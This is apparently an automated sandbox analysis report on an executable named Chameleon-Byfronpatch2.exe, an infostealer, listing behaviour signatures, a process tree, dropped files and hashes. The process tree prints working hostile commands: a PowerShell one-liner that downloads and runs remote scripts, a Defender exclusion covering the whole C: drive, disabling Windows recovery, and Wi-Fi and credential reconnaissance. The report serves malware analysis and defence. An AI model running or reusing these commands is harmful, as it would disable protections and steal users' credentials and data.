Analysis

  • max time kernel
    11s
  • max time network
    16s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/08/2024, 07:44

General

  • Target

    Chameleon-Byfronpatch2.exe

  • Size

    9.2MB

  • MD5

    addbf6301c1ea797554a0152da23d5ae

  • SHA1

    01a22ed2bb77ff84546147098348a07bc0eecbc6

  • SHA256

    585c788d34f68b6fdc7695d5752e6450ae5f3e2c7dfd0dabaafefc598b29ecdb

  • SHA512

    9507a56c571d1f9ddf67dd9b5200c340416b00bb956c52fa88b8cd2108d5f789cdf5c04d60aa06c5c9bde8bec2e6a324c89435eec57708e1f66fd0a98c767a11

  • SSDEEP

    98304:NLTHcOdLkG6nUDvQlPU68hkY8LdYwTE/zTPy2R0r:mOdLkG9TChA/zLc

Malware Config

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Modifies system certificate store 2 TTPs 5 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Chameleon-Byfronpatch2.exe
    "C:\Users\Admin\AppData\Local\Temp\Chameleon-Byfronpatch2.exe"
    1⤵
    • Drops file in Drivers directory
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2524
    • C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
      2⤵
      • Views/modifies file attributes
      PID:4624
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -C "Add-MpPreference -ExclusionPath 'C:'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3612
    • C:\Windows\system32\reagentc.exe
      reagentc.exe /disable
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      PID:4420
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3512
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2i4mkpwa\2i4mkpwa.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3244
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES98F4.tmp" "c:\Users\Admin\AppData\Local\Temp\2i4mkpwa\CSCA67194F6663D4135954AB988437276B5.TMP"
          4⤵
            PID:4864
      • C:\Windows\system32\cmd.exe
        cmd /c rundll32.exe user32.dll,SwapMouseButton
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4816
        • C:\Windows\system32\rundll32.exe
          rundll32.exe user32.dll,SwapMouseButton
          3⤵
            PID:932
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
          2⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2212
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0suovvqz\0suovvqz.cmdline"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3544
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9961.tmp" "c:\Users\Admin\AppData\Local\Temp\0suovvqz\CSC7B7D72D1329743A59E4E29E7DDFD75E.TMP"
              4⤵
                PID:4224
            • C:\Windows\system32\netsh.exe
              "C:\Windows\system32\netsh.exe" wlan show profiles
              3⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:1104
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup administrators
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3584
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup administrators
                4⤵
                  PID:2464
              • C:\Windows\system32\netsh.exe
                "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
                3⤵
                • Modifies Windows Firewall
                • Event Triggered Execution: Netsh Helper DLL
                PID:4960
              • C:\Windows\system32\whoami.exe
                "C:\Windows\system32\whoami.exe" /all
                3⤵
                  PID:3180
                • C:\Windows\system32\net.exe
                  "C:\Windows\system32\net.exe" user
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4428
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 user
                    4⤵
                      PID:1928
                  • C:\Windows\system32\ipconfig.exe
                    "C:\Windows\system32\ipconfig.exe" /displaydns
                    3⤵
                    • Gathers network information
                    PID:3732
                  • C:\Windows\system32\net.exe
                    "C:\Windows\system32\net.exe" localgroup
                    3⤵
                      PID:1392
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 localgroup
                        4⤵
                          PID:4396
                      • C:\Windows\System32\Wbem\WMIC.exe
                        "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
                        3⤵
                          PID:2424
                        • C:\Windows\system32\NETSTAT.EXE
                          "C:\Windows\system32\NETSTAT.EXE" -ano
                          3⤵
                          • System Network Connections Discovery
                          • Gathers network information
                          PID:4624
                        • C:\Windows\System32\Wbem\WMIC.exe
                          "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
                          3⤵
                            PID:4804
                          • C:\Windows\system32\ipconfig.exe
                            "C:\Windows\system32\ipconfig.exe" /all
                            3⤵
                            • Gathers network information
                            PID:464
                          • C:\Windows\system32\ROUTE.EXE
                            "C:\Windows\system32\ROUTE.EXE" print
                            3⤵
                              PID:1036
                            • C:\Windows\system32\ARP.EXE
                              "C:\Windows\system32\ARP.EXE" -a
                              3⤵
                              • Network Service Discovery
                              PID:3900
                            • C:\Windows\system32\netsh.exe
                              "C:\Windows\system32\netsh.exe" wlan show profile
                              3⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Network Configuration Discovery: Wi-Fi Discovery
                              PID:628

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                          Filesize

                          328B

                          MD5

                          89f0b4c296d921ec8cd37a7d25e06157

                          SHA1

                          7a35866f29e260f261649e021cc8f26808188c52

                          SHA256

                          4f6f6ebf64ee0d8b1fc74e6c4bb79ab557538590ff77595ea8921fa8ac368e67

                          SHA512

                          c4b8181f8f5ea8b96b7a53d3b3935769f09accaef946291c69c8c8d7c2c33051c32c7beca086d56b114d6d81e67a718f51a9260135bd3a3cb4792ba22ce50ce4

                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                          Filesize

                          2KB

                          MD5

                          d85ba6ff808d9e5444a4b369f5bc2730

                          SHA1

                          31aa9d96590fff6981b315e0b391b575e4c0804a

                          SHA256

                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                          SHA512

                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          360B

                          MD5

                          42a3e507d48a9cb6215ca9938eab61eb

                          SHA1

                          58c18dbd1b4fc1f724093100eebb2b1deba3c42f

                          SHA256

                          7f80bfda515b23fe7c4d67bb7c8513fa8a41bd070f09fd587f1be757a12c1cc2

                          SHA512

                          97ac52563a533a781fc333f1304d5ace76101266ade0b50f6a83e469dc1f2a594fe5c7de317d805d753f18d1263f4dc1f4c9e8dc195a1fce27b75eff87c8aefd

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          0789009e381ff689e09144d17087b434

                          SHA1

                          43ecb03b5bf2aedd9a0ef7aad408f32b3ecf2eed

                          SHA256

                          120dcff0b78993813606335996b0ff453a428710a8f2af6700070fb210cacdad

                          SHA512

                          4064b89ef58eab748f0ec6a4ce619b04fb321df90fe32c54ed65e3f02e0116897b066eb41a3586ef8bb513f252b828598196f43e16f3b669d8f11a949b3d65a8

                        • C:\Users\Admin\AppData\Local\Temp\0suovvqz\0suovvqz.dll

                          Filesize

                          4KB

                          MD5

                          69116df6e887b86280d27665385f4e3f

                          SHA1

                          bd2512456e11976c16ed808ede040ddff8301669

                          SHA256

                          f256b2e143ade475f5b4c781caf08fd14ec9744dd2d71b63776f169e44a6772f

                          SHA512

                          e8bc299008a8eb650ad43d1fd3aeda5ad10a7f0912e08733cfe1cf9c228864bf52b1e7664adc93e374fa1b41585403fe339a29d3a922e4330e533433227465b8

                        • C:\Users\Admin\AppData\Local\Temp\2i4mkpwa\2i4mkpwa.dll

                          Filesize

                          4KB

                          MD5

                          a6a377a6b5aeac3e7d54e37437c79513

                          SHA1

                          0514eef7c7324f1d5327cf1519fb1dba4c681e6e

                          SHA256

                          820f2079dab9d1a1b2b2f2ee4521cab9c32a2b396144c277559ae652db1ed592

                          SHA512

                          ffc0226b98af3e33f27a8ea3429df0213d22241c566a10df3b394acd00d59d7c1aa8a52fc0a8010fff3d5215aa2fd42894a750ca8c6061e827d07bf4d684b9f2

                        • C:\Users\Admin\AppData\Local\Temp\RES98F4.tmp

                          Filesize

                          1KB

                          MD5

                          543ce85203e686fcc270245d5c59e4dc

                          SHA1

                          07f57f133a0447f60c76caa2ccf4335707dd376c

                          SHA256

                          74157925d9953770e150533982a7ba71ddc9bc8c798da7a2113932a4805eba1f

                          SHA512

                          906e59ebb9eb9579c313eb7f7d6d45964cd6c4c0394343df15483a3d052f227d464985fdb0219ced9c7d1b96e76bce6b4c2c08a750b4295ef0d4b440db4c0960

                        • C:\Users\Admin\AppData\Local\Temp\RES9961.tmp

                          Filesize

                          1KB

                          MD5

                          dfcc5317b57d5f62fc55a3343bf30a1f

                          SHA1

                          3a5c6653123be0affb70d1926f937166ba76b192

                          SHA256

                          5c18768976f14187a17580d8810831456d5b40648fd333abb060c1b61e4f245e

                          SHA512

                          deb8c9bf5234c71b69e1918e4a5eb83f33fc8c13507ba11e38d15b451da8896af85a1d1b912136ee339dd7192477d4b01a107720065c61d3fb5ffb8198ab046a

                        • C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

                          Filesize

                          1.5MB

                          MD5

                          716d6e406cc1b496c213ac5067a9e722

                          SHA1

                          f54674790e2f873fca814570fbe81539c847bf88

                          SHA256

                          5bad8a7104bc9f8b206a0578563483e49b7cb88b104eda7e58a57aad33547b64

                          SHA512

                          c2a29188894429d1ad850f4dce04c41e87ba9bf1ca8db59ff7ee3890f0cc3daf7400bc31a88c151ca446a0f0316aa1e4eb8bcf568266a7e2608a33c212c18fbb

                        • C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SensitiveFiles\SyncExport.txt

                          Filesize

                          1.4MB

                          MD5

                          272dfeca45d9c51434c255a8259d21d1

                          SHA1

                          802ec5f51f21812e300bce672b3f767ba1e78591

                          SHA256

                          87d2f1d3b25b1fd04c471271e24bf2357ced1bfa109784e516757113902aa5c9

                          SHA512

                          b7151b131fd072daa0d06e78aadf9ec5c946d2c93f741c26d55174779d9ea3bb05cd17ec1908f113070278c860c034bb39febabeb087b44e3daf397a86df9bd8

                        • C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

                          Filesize

                          58KB

                          MD5

                          be89a582d40cbd9599acd2cb636de7a3

                          SHA1

                          fa149df86c526a1e825086850368f30515040285

                          SHA256

                          cad144e670f8fd44a6044fcb5d0a6c6d80eef89696cfea6bb252008d0698853c

                          SHA512

                          8083ae8013e3ccdfc0b0aa2315def310d8ede59d02ffef9556a87e2d1649bd273d38b89b7deedcfdea686834d49be746102ad70c49ae2fa2f09e97888496b146

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jdef0ekn.2x0.ps1

                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        • C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

                          Filesize

                          2KB

                          MD5

                          9758656bbe8589c66bb241b052490c72

                          SHA1

                          b73da83fb3ae6b86c6365769a04de9845d5c602c

                          SHA256

                          e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

                          SHA512

                          da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

                        • C:\Windows\system32\drivers\etc\hosts

                          Filesize

                          2KB

                          MD5

                          33963639fb0ee0d79107103504711c9e

                          SHA1

                          b5c525632b94582ac863c600bc613ab658fab61b

                          SHA256

                          c2d71376ebf448ca83881ffed011973822c8f755a563b1087214bf571692ad89

                          SHA512

                          b61a4f6b3a81aac3dd9a35d837232562c5d927647a639ef6eb728479f947d63f32889371f438b3bbf075ec9bbbe81cd0b06c4647d4329d74eaa4dc979ad6787d

                        • \??\c:\Users\Admin\AppData\Local\Temp\0suovvqz\0suovvqz.0.cs

                          Filesize

                          1KB

                          MD5

                          8a1e7edb2117ec5dde9a07016905923b

                          SHA1

                          0155dbeeb16333e2eaa767b0209750efee56f47f

                          SHA256

                          c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

                          SHA512

                          4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

                        • \??\c:\Users\Admin\AppData\Local\Temp\0suovvqz\0suovvqz.cmdline

                          Filesize

                          369B

                          MD5

                          41c81f682907c3644219b12566260694

                          SHA1

                          ddb34d8c66ab702163f07d85a7c217283c996dce

                          SHA256

                          4470ebcae6f5af6c3e8a5c821875d1c256485d21fd77020177438ea5f466c3df

                          SHA512

                          262bfcb6432cafcfae7bbf21ee7b52f0327947debfce3a4ef1161a89d6f96e38d0483cbe702ec9e714dd3a53d8c77974fd723dcfcfbcb8dc24511bb7badeb5da

                        • \??\c:\Users\Admin\AppData\Local\Temp\0suovvqz\CSC7B7D72D1329743A59E4E29E7DDFD75E.TMP

                          Filesize

                          652B

                          MD5

                          70af3a6ba9b69c75fe051e0022f099cc

                          SHA1

                          f085fbc6be7ba1d883eebdbc86dc689548c3138c

                          SHA256

                          d2884149c704ea40b6c302a21a707e3830a38a9f7d94b7619edd0634893ed0cc

                          SHA512

                          abc7322dc02ddc1f3923df8ca647d88e5b68dedd963f30a9816897e854f8b9ae0f3a0228069335ba8dcc1dfe8d15f768b4e156f7af97af0c58f82ae3013fcca5

                        • \??\c:\Users\Admin\AppData\Local\Temp\2i4mkpwa\2i4mkpwa.cmdline

                          Filesize

                          369B

                          MD5

                          0e48c6fd0da9150ba09684f7d0c922b2

                          SHA1

                          d3c8f5de1f1e5f0049f5696e4f77e81cb4d386d9

                          SHA256

                          47bfb1cfbb8fb06716edf26ad254585338a670e067f4ab1ec9263ae34ac2a69c

                          SHA512

                          4247af2d4090de28415184cc5da5b2ffbf07df45de543c93d16a726e1cb070bac5f1ded6756758fa5ce22b3f3be213ef8e214ba0cbf8bb15938915f6b9b2743d

                        • \??\c:\Users\Admin\AppData\Local\Temp\2i4mkpwa\CSCA67194F6663D4135954AB988437276B5.TMP

                          Filesize

                          652B

                          MD5

                          3bc4e92b8a2b790cd079601f61171058

                          SHA1

                          7f44224f10e3716cd78bb3da88f865defe9fcf99

                          SHA256

                          af2a7088bb30a0560d063b2e1602e9f2412ec0900d1ad9d18f91cca8e61784d5

                          SHA512

                          f77502c77700f81335cdf89325c338ad7176d7b04199ccc3b5e5faaabc2c96d81d08cf1a6a567a45b82d57b596709cb60387c0ddc3b993d95bb459b8ff4389af

                        • memory/2212-68-0x000001C7A8030000-0x000001C7A8038000-memory.dmp

                          Filesize

                          32KB

                        • memory/2212-114-0x000001C7C0E40000-0x000001C7C0E52000-memory.dmp

                          Filesize

                          72KB

                        • memory/2212-75-0x000001C7C0E30000-0x000001C7C0E54000-memory.dmp

                          Filesize

                          144KB

                        • memory/2212-125-0x000001C7C0440000-0x000001C7C065C000-memory.dmp

                          Filesize

                          2.1MB

                        • memory/2212-74-0x000001C7C0E30000-0x000001C7C0E5A000-memory.dmp

                          Filesize

                          168KB

                        • memory/2212-70-0x000001C7C1370000-0x000001C7C1B16000-memory.dmp

                          Filesize

                          7.6MB

                        • memory/2212-115-0x000001C7C0E10000-0x000001C7C0E1A000-memory.dmp

                          Filesize

                          40KB

                        • memory/3512-38-0x00007FFCD1790000-0x00007FFCD2251000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3512-65-0x00000218F4B60000-0x00000218F4B68000-memory.dmp

                          Filesize

                          32KB

                        • memory/3512-90-0x00007FFCD1790000-0x00007FFCD2251000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3512-19-0x00000218DC9F0000-0x00000218DCA12000-memory.dmp

                          Filesize

                          136KB

                        • memory/3512-89-0x00000218F4D30000-0x00000218F4F4C000-memory.dmp

                          Filesize

                          2.1MB

                        • memory/3512-14-0x00007FFCD1790000-0x00007FFCD2251000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3512-3-0x00007FFCD1793000-0x00007FFCD1795000-memory.dmp

                          Filesize

                          8KB

                        • memory/3612-51-0x0000020B9E0E0000-0x0000020B9E2FC000-memory.dmp

                          Filesize

                          2.1MB